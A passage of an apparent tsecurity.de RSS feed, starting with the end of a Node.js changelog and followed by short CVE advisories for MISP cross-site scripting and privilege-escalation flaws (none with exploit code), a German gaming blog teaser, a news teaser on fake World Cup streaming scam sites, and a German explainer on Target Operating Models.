<li>[<a href="https://github.com/nodejs/node/commit/275cf909b6"><code>275cf909b6</code></a>] - <strong>src,sqlite</strong>: only pass <code>xFilter</code> when user provided a callback (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63516" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63516/hovercard">#63516</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/287e02303f"><code>287e02303f</code></a>] - <strong>src,sqlite</strong>: remove dead code (Edy Silva) <a href="https://github.com/nodejs/node/pull/63204" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63204/hovercard">#63204</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/58fa2ee189"><code>58fa2ee189</code></a>] - <strong>stream</strong>: switch to internal <code>sleep</code> binding (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63611" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63611/hovercard">#63611</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f954ab3f1a"><code>f954ab3f1a</code></a>] - <strong>stream</strong>: use data listener for compose forwarding (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63593" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63593/hovercard">#63593</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/dc57173003"><code>dc57173003</code></a>] - <strong>stream</strong>: fix Writable.toWeb() hang on synchronous drain (sangwook) <a href="https://github.com/nodejs/node/pull/61197" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/61197/hovercard">#61197</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cee279c5d6"><code>cee279c5d6</code></a>] - <strong>stream</strong>: remove unnecessary check (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63030" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63030/hovercard">#63030</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61b20f60a3"><code>61b20f60a3</code></a>] - <strong>test</strong>: update tls/crypto behaviour expectations when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a835363808"><code>a835363808</code></a>] - <strong>test</strong>: update WPT for WebCryptoAPI to 97bbc7247a (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63417" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63417/hovercard">#63417</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a00297480b"><code>a00297480b</code></a>] - <strong>test</strong>: update WPT resources, interfaces and WebCryptoAPI (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62389" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62389/hovercard">#62389</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5a95a2b055"><code>5a95a2b055</code></a>] - <strong>test</strong>: shorten path in net pipe connect errors (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63405" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63405/hovercard">#63405</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5e8ff22d8f"><code>5e8ff22d8f</code></a>] - <strong>test</strong>: remove test-node-output-v8-warning (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63469" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63469/hovercard">#63469</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ee15380950"><code>ee15380950</code></a>] - <strong>test</strong>: update test426-fixtures to 9b9e225b5a63139e9a95cdd1bf874a8f0b9d131 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63373" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63373/hovercard">#63373</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9e063d9bea"><code>9e063d9bea</code></a>] - <strong>test</strong>: update WPT for url to e4a4672e9e (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63372" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63372/hovercard">#63372</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/503bee4b43"><code>503bee4b43</code></a>] - <strong>test</strong>: deflake async-hooks statwatcher test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63396" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63396/hovercard">#63396</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cccc7c32d8"><code>cccc7c32d8</code></a>] - <strong>test</strong>: avoid test_runner watch restart in spec snapshot (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63392" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63392/hovercard">#63392</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c89489258c"><code>c89489258c</code></a>] - <strong>test</strong>: reduce watch mode restart flakiness (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63390" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63390/hovercard">#63390</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4d5e2578e"><code>e4d5e2578e</code></a>] - <strong>test</strong>: isolate rerun-failures state file under tmpdir (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63449" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63449/hovercard">#63449</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/362644a9ba"><code>362644a9ba</code></a>] - <strong>test</strong>: wait for ok before initial break after restart (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62807" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62807/hovercard">#62807</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c4058d0e05"><code>c4058d0e05</code></a>] - <strong>test</strong>: disable Maglev in near-heap-limit worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63398" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63398/hovercard">#63398</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/214da630a7"><code>214da630a7</code></a>] - <strong>test</strong>: deflake connection refused proxy tests (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63395" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63395/hovercard">#63395</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1d61a29876"><code>1d61a29876</code></a>] - <strong>test</strong>: avoid repeated writes in watch helper (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63386" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63386/hovercard">#63386</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2004e25387"><code>2004e25387</code></a>] - <strong>test</strong>: deflake watch mode worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63384" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63384/hovercard">#63384</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d691cccfc1"><code>d691cccfc1</code></a>] - <strong>test</strong>: relax test-memory-usage arrayBuffers check (inoway46) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0ff6bf853c"><code>0ff6bf853c</code></a>] - <strong>test</strong>: reduce flakiness of <code>different-registry-per-thread</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d9f4e8e503"><code>d9f4e8e503</code></a>] - <strong>test</strong>: fix flaky test-watch-mode-inspect timeout (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63361" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63361/hovercard">#63361</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d7cd50328"><code>6d7cd50328</code></a>] - <strong>test</strong>: relax min assertion in test-performance-eventloopdelay (Marco) <a href="https://github.com/nodejs/node/pull/63100" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63100/hovercard">#63100</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9dafe1d2d8"><code>9dafe1d2d8</code></a>] - <strong>test</strong>: avoid flaky restart sync in debugger exceptions test (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62055" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62055/hovercard">#62055</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/989b2de973"><code>989b2de973</code></a>] - <strong>test</strong>: avoid initial-break wait in restart-message (inoway46) <a href="https://github.com/nodejs/node/pull/62060" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62060/hovercard">#62060</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a072a25ee7"><code>a072a25ee7</code></a>] - <strong>test</strong>: move FFI tests to <code>NATIVE_SUITES</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63165" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63165/hovercard">#63165</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/64efbfd878"><code>64efbfd878</code></a>] - <strong>test</strong>: use ERM to destroy sqlite database handles after tests (René) <a href="https://github.com/nodejs/node/pull/63076" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63076/hovercard">#63076</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7dee66cd94"><code>7dee66cd94</code></a>] - <strong>test_runner</strong>: dont buffer unordered events in process isolation mode (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63432" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63432/hovercard">#63432</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d257eec1e3"><code>d257eec1e3</code></a>] - <strong>test_runner</strong>: fix --test-rerun-failures swallowing failures on retry (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63431" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63431/hovercard">#63431</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/288c320e2f"><code>288c320e2f</code></a>] - <strong>test_runner</strong>: show replayed-from-attempt hint in spec reporter (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/904bdf5bb4"><code>904bdf5bb4</code></a>] - <strong>test_runner</strong>: preserve run duration when using test-rerun (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/df183d7bfa"><code>df183d7bfa</code></a>] - <strong>test_runner</strong>: avoid hanging on incomplete v8 frames (Ali Hassan) <a href="https://github.com/nodejs/node/pull/62704" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62704/hovercard">#62704</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ec86c69726"><code>ec86c69726</code></a>] - <strong>test_runner</strong>: fix diagnostics channel context tracking (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63283" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63283/hovercard">#63283</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/94e5f63b83"><code>94e5f63b83</code></a>] - <strong>tls</strong>: add unsupported renegotiation error (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/06d308fb61"><code>06d308fb61</code></a>] - <strong>tools</strong>: prevent lib code from reading KeyObject and CryptoKey accessors (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2e4a0d0c91"><code>2e4a0d0c91</code></a>] - <strong>tools</strong>: bump brace-expansion from 5.0.5 to 5.0.6 in /tools/eslint (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63415" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63415/hovercard">#63415</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9666b366"><code>4c9666b366</code></a>] - <strong>tools</strong>: skip commit-lint on backport pull requests (Marco) <a href="https://github.com/nodejs/node/pull/63378" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63378/hovercard">#63378</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/67d0c490a8"><code>67d0c490a8</code></a>] - <strong>tools</strong>: fix skip of <code>test-internet</code> on forks (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63492" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63492/hovercard">#63492</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f73c7cac"><code>02f73c7cac</code></a>] - <strong>tools</strong>: bump the eslint group in /tools/eslint with 4 updates (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63075" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63075/hovercard">#63075</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5d016d3241"><code>5d016d3241</code></a>] - <strong>tools</strong>: update gyp-next to 0.22.2 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63374" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63374/hovercard">#63374</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/55af0f0edb"><code>55af0f0edb</code></a>] - <strong>tools</strong>: fix test426 updater (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63271" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63271/hovercard">#63271</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d8475e167a"><code>d8475e167a</code></a>] - <strong>tools</strong>: use different branch for tool updates on staging branches (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63110" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63110/hovercard">#63110</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c605df9e50"><code>c605df9e50</code></a>] - <strong>util</strong>: remove unused functions (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63612/hovercard">#63612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fe4540ebdb"><code>fe4540ebdb</code></a>] - <strong>util</strong>: create hex style cache and fast path (Guilherme Araújo) <a href="https://github.com/nodejs/node/pull/62999" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62999/hovercard">#62999</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-47928 | MISP up to 2.4.166 Template File upload_file.ctp cross site scripting]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in MISP up to 2.4.166. Impacted is an unknown function of the file app/View/Templates/upload_file.ctp of the component Template File Handler. Such manipulation leads to cross site scripting.

This vulnerability is referenced as CVE-2022-47928. I...]]></description>
<link>https://tsecurity.de/de/3618561/sicherheitsluecken/cve-2022-47928-misp-up-to-24166-template-file-uploadfilectp-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618561/sicherheitsluecken/cve-2022-47928-misp-up-to-24166-template-file-uploadfilectp-cross-site-scripting/</guid>
<pubDate>Tue, 23 Jun 2026 16:07:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/misp">MISP up to 2.4.166</a>. Impacted is an unknown function of the file <em>app/View/Templates/upload_file.ctp</em> of the component <em>Template File Handler</em>. Such manipulation leads to cross site scripting.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2022-47928">CVE-2022-47928</a>. It is possible to launch the attack remotely. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5720 | Malware Information Sharing Platform up to 2.3.89 template-creation ajaxification.js cross site scripting (BID-92738)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Malware Information Sharing Platform up to 2.3.89. This affects an unknown part of the file add.ctp/edit.ctp/ajaxification.js of the component template-creation. Performing a manipulation results in cross site scripting.

Thi...]]></description>
<link>https://tsecurity.de/de/3618554/sicherheitsluecken/cve-2015-5720-malware-information-sharing-platform-up-to-2389-template-creation-ajaxificationjs-cross-site-scripting-bid-92738/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618554/sicherheitsluecken/cve-2015-5720-malware-information-sharing-platform-up-to-2389-template-creation-ajaxificationjs-cross-site-scripting-bid-92738/</guid>
<pubDate>Tue, 23 Jun 2026 16:07:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/malware_information_sharing_platform">Malware Information Sharing Platform up to 2.3.89</a>. This affects an unknown part of the file <em>add.ctp/edit.ctp/ajaxification.js</em> of the component <em>template-creation</em>. Performing a manipulation results in cross site scripting.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2015-5720">CVE-2015-5720</a>. The attack can be initiated remotely. There is not any exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Xbox Game Pass und chronische Erkrankungen – ein persönlicher Blick]]></title>
<description><![CDATA[Bevor ich in dieses Thema eintauche, möchte ich eines klarstellen: Menschen mit chronischen Erkrankungen sind so unterschiedlich wie Menschen ohne Erkrankungen. Dennoch verbindet uns alle etwas: Der Spaß am Spielen! Es gibt keine universelle Erfahrung, keine Schablone, die auf alle passt. Was ich...]]></description>
<link>https://tsecurity.de/de/3617675/it-nachrichten/xbox-game-pass-und-chronische-erkrankungen-ein-persoenlicher-blick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617675/it-nachrichten/xbox-game-pass-und-chronische-erkrankungen-ein-persoenlicher-blick/</guid>
<pubDate>Tue, 23 Jun 2026 11:02:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img src="https://www.drwindows.de/news/wp-content/uploads/2030/06/SoMe-.net-template-720x360.png" class="attachment-single-thumb size-single-thumb wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.drwindows.de/news/wp-content/uploads/2030/06/SoMe-.net-template-720x360.png 720w, https://www.drwindows.de/news/wp-content/uploads/2030/06/SoMe-.net-template-300x150.png 300w, https://www.drwindows.de/news/wp-content/uploads/2030/06/SoMe-.net-template-1024x512.png 1024w, https://www.drwindows.de/news/wp-content/uploads/2030/06/SoMe-.net-template-768x384.png 768w, https://www.drwindows.de/news/wp-content/uploads/2030/06/SoMe-.net-template-643x322.png 643w, https://www.drwindows.de/news/wp-content/uploads/2030/06/SoMe-.net-template.png 1280w" sizes="(max-width: 720px) 100vw, 720px"></div>
<p>Bevor ich in dieses Thema eintauche, möchte ich eines klarstellen: Menschen mit chronischen Erkrankungen sind so unterschiedlich wie Menschen ohne Erkrankungen. Dennoch verbindet uns alle etwas: Der Spaß am Spielen! Es gibt keine universelle Erfahrung, keine Schablone, die auf alle passt. Was ich hier beschreibe, ist meine persönliche Sicht, geprägt von meinem eigenen Körper, meinen […]</p>
<p>Der Beitrag <a href="https://www.drwindows.de/news/xbox-game-pass-und-chronische-erkrankungen-ein-persoenlicher-blick">Xbox Game Pass und chronische Erkrankungen – ein persönlicher Blick</a> erschien zuerst auf <a href="https://www.drwindows.de/news">Dr. Windows</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Free, no-signup World Cup streams serve scams instead of football]]></title>
<description><![CDATA[Researchers at Malwarebytes identified dozens of websites claiming to offer free access to FIFA World Cup matches. Instead of streaming games, the sites directed visitors through a chain of advertising pages designed to generate revenue for their operators. Fake World Cup streaming website (Sourc...]]></description>
<link>https://tsecurity.de/de/3617254/it-security-nachrichten/free-no-signup-world-cup-streams-serve-scams-instead-of-football/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617254/it-security-nachrichten/free-no-signup-world-cup-streams-serve-scams-instead-of-football/</guid>
<pubDate>Tue, 23 Jun 2026 07:08:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researchers at Malwarebytes identified dozens of websites claiming to offer free access to FIFA World Cup matches. Instead of streaming games, the sites directed visitors through a chain of advertising pages designed to generate revenue for their operators. Fake World Cup streaming website (Source: Malwarebytes) “We’ve identified more than 40 websites that are effectively identical. They use different World Cup-themed names, but behind the scenes they’re running the same page template, the same code, and … <a href="https://www.helpnetsecurity.com/2026/06/23/fake-world-cup-streaming-sites-scams/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/23/fake-world-cup-streaming-sites-scams/">Free, no-signup World Cup streams serve scams instead of football</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Was ist ein Target Operating Model?]]></title>
<description><![CDATA[Mit Hilfe des Target Operating Models lassen sich Visionen in der Unternehmenspraxis umsetzen.
					Foto: kan_chana – shutterstock.com




Die Digitalisierung ist allgegenwärtig. Um immer “up to date” und wettbewerbsfähig zu bleiben, müssen sich Unternehmen ständig neu erfinden: Systeme optimiere...]]></description>
<link>https://tsecurity.de/de/3617191/it-security-nachrichten/was-ist-ein-target-operating-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617191/it-security-nachrichten/was-ist-ein-target-operating-model/</guid>
<pubDate>Tue, 23 Jun 2026 06:23:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Mit Hilfe des Target Operating Models lassen sich Visionen in der Unternehmenspraxis umsetzen." title="Mit Hilfe des Target Operating Models lassen sich Visionen in der Unternehmenspraxis umsetzen." src="https://images.computerwoche.de/bdb/3327878/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit Hilfe des Target Operating Models lassen sich Visionen in der Unternehmenspraxis umsetzen.</p></figcaption></figure><p class="imageCredit">
					Foto: kan_chana – shutterstock.com</p></div>




<p>Die Digitalisierung ist allgegenwärtig. Um immer “up to date” und wettbewerbsfähig zu bleiben, müssen sich Unternehmen ständig neu erfinden: Systeme optimieren, Prozesse verschlanken und Kosten reduzieren. Unternehmensvisionen und deren Umsetzung liegen jedoch oft weit auseinander. Als Verbindungsstück entstand so das Target Operating Model.</p>



<h3 class="wp-block-heading">Target Operating Model – Definition</h3>



<p>Das <a href="https://en.wikipedia.org/wiki/Target_operating_model" title="Target Operating Model" target="_blank" rel="noopener">Target Operating Model</a> oder zu Deutsch “Zielbetriebsmodell” hilft Unternehmen, zukünftige <a href="https://www.haufe.de/controlling/controllerpraxis/target-operating-model-vision-und-strategie-greifbar-machen_112_486924.html" title="Optimierungsstrategien zu definieren und umzusetzen" target="_blank" rel="noopener">Optimierungsstrategien zu definieren und umzusetzen</a>. Die Strategien variieren dabei in Komplexität und Detailgrad. Das Zielbetriebsmodell bildet die <a href="https://futureorganisationaldesign.wordpress.com/tag/target-operating-model-template/" title="Brücke" target="_blank" rel="noopener">Brücke</a> zwischen einer Entwicklungsidee und der Implementierung in die bestehenden Organisationsstrukturen (Mitarbeiter, Prozesse und Technologie) eines Unternehmens.</p>



<p>Die Idee des Modells besteht darin, durch die Analyse des aktuellen Zustands (“as is”), Lücken zu schließen und Vorgänge zu optimieren, um so den festgelegten Zielzustand (“to be”) zu erreichen. Die einzelnen Schritte (Milestones) auf dem Weg zum Ziel werden in einer sogenannten <a href="https://www.computerwoche.de/article/2792928/entwicklerwerkzeug-fuer-softwareprojekte.html" title="Roadmap" target="_blank">Roadmap</a> festgehalten. Das Motto lautet: Der Weg ist das Ziel. </p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<h3 class="wp-block-heading">Zielbetriebsmodell – Vorteile</h3>



<p>Durch die Digitalisierung ist es für Unternehmen weltweit heute unverzichtbar, schnell auf unterschiedliche Marktveränderungen reagieren zu können. Festgefahrene Prozesse und Strukturen können Firmen dabei jedoch im Weg stehen. Hier kann das Target Operating Model helfen:</p>



<ul class="wp-block-list">
<li><p>Mit Hilfe des Target Operating Models wird statt der aufgezwungenen Veränderung ein gemeinsames Ziel in den Vordergrund gestellt.</p></li>



<li><p>Durch seine Transparenz und detaillierte Beschreibung wird der Transformationsprozess für jeden Mitarbeiter klar und nachvollziehbar. </p></li>



<li><p>Die Anpassungen am Unternehmen können mit Hilfe der Roadmap organisiert und strukturiert durchgeführt werden. </p></li>



<li><p>Der Erfolg der Umsetzung lässt sich anhand der in Zahlen übersetzten Milestones messen.</p></li>
</ul>



<h3 class="wp-block-heading">Target Operating Model – Erfolgskriterien</h3>



<p>Damit der Einsatz eines Target Operating Models auch wirklich erfolgreich ist, müssen einige Schritte beachtet werden. </p>



<ul class="wp-block-list">
<li><p><strong>Klare Zielsetzung</strong>: Die Erwartungen an ein neu aufgestelltes Unternehmen sind von Mitarbeiter zu Mitarbeiter unterschiedlich. Ein umfassender Austausch über Prioritäten und Ziele des Target Operating Models ist dementsprechend für eine effektive sowie effiziente Umsetzung des Models unverzichtbar.</p></li>



<li><p><strong>“Leading by example”</strong>: Damit das Target Operating Model so erfolgreich wie möglich ablaufen kann, ist es wichtig, dass CEOs und andere Führungskräfte an der Entwicklung der Roadmap sowie des Zielzustandes beteiligt sind. Wenn engagiertes Führungspersonal hinter dem Wandlungsprozess steht, können so mehr Mitarbeiter für den Umschwung begeistert werden. Dies erleichtert außerdem die Implementierung von neuen Prozessen in alten und oft festgefahrenen Strukturen.</p></li>



<li><p><strong>Analyse des Istzustands</strong>: Es gibt kein Ziel ohne Start. Das bedeutet, dass die Ausgangs-Basis erst ausführlich analysiert werden muss, bevor man das Zielszenario definieren kann. Eine <a title="SWOT-Analyse " href="https://www.cio.de/a/beispiele-fuer-swot-analysen,874858" target="_blank">SWOT-Analyse </a>(Strengths, Weaknesses, Opportunities and Threats) hilft dabei, die größten Stärken sowie Schwächen eines Unternehmens zu erfassen. Auch ein direkter Vergleich zu Konkurrenzfirmen ist dabei sehr wichtig. Außerdem sollte sich das Unternehmen als “Großes Ganzes” sehen, so dass jede Mitarbeiterin und jeder Mitarbeiter in allen Abteilungen sich schlussendlich im Target Ooperating Model und Zielszenario wiederfinden kann.</p></li>



<li><p><strong>Ausarbeitung der Roadmap</strong>: Beim Erstellen der Roadmap geht es ganz bewusst darum, den Finger in die Wunde zu legen und Schwachstellen sowie Fehler im eigenen System zu erkennen. Nur wenn ein Unternehmen diese Punkte benennt, können die richtigen Anpassungen vorgenommen und in messbare Teilziele übersetzt werden. Diese Milestones sind Anhaltspunkte und beschreiben, wie die Transformation ablaufen sollte.</p></li>
</ul>



<p>Wenn all diese Schritte befolgt werden, sollte einer Umsetzung der Unternehmensziele nichts mehr im Weg stehen. (kf)</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-35502 | MISP 2.4.144 Template generic_field.ctp privilege escalation]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in MISP 2.4.144. Impacted is an unknown function of the file app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp of the component Template Handler. Such manipulation leads to privilege escalation.

This vulnerability i...]]></description>
<link>https://tsecurity.de/de/3617120/sicherheitsluecken/cve-2021-35502-misp-24144-template-genericfieldctp-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617120/sicherheitsluecken/cve-2021-35502-misp-24144-template-genericfieldctp-privilege-escalation/</guid>
<pubDate>Tue, 23 Jun 2026 05:39:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/misp">MISP 2.4.144</a>. Impacted is an unknown function of the file <em>app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp</em> of the component <em>Template Handler</em>. Such manipulation leads to privilege escalation.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2021-35502">CVE-2021-35502</a>. Access to the local network is required for this attack to succeed. There is no exploit available.

It is advisable to implement a patch to correct this issue.]]></content:encoded>
</item>
<item>
